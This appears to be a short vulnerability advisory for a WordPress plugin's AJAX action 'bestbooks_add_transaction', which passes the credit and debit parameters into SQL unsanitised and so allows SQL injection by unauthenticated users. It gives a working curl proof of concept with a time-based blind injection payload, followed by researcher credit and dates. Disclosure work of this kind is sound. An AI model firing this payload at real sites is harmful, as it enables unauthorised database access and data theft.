The plugin does not sanitise and escape some parameters before using them in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users
Affected parameters: credit and debit curl https://example.com/wp-admin/admin-ajax.php \ --data 'action=bestbooks_add_transaction&type=x&account=x&date=x&description=3&debit=(CASE WHEN (9277=9277) THEN SLEEP(5) ELSE 9277 END)&credit=1'
cydave
cydave
Yes
2022-05-17 (about 1 years ago)
2022-05-17 (about 1 years ago)
2022-05-18 (about 1 years ago)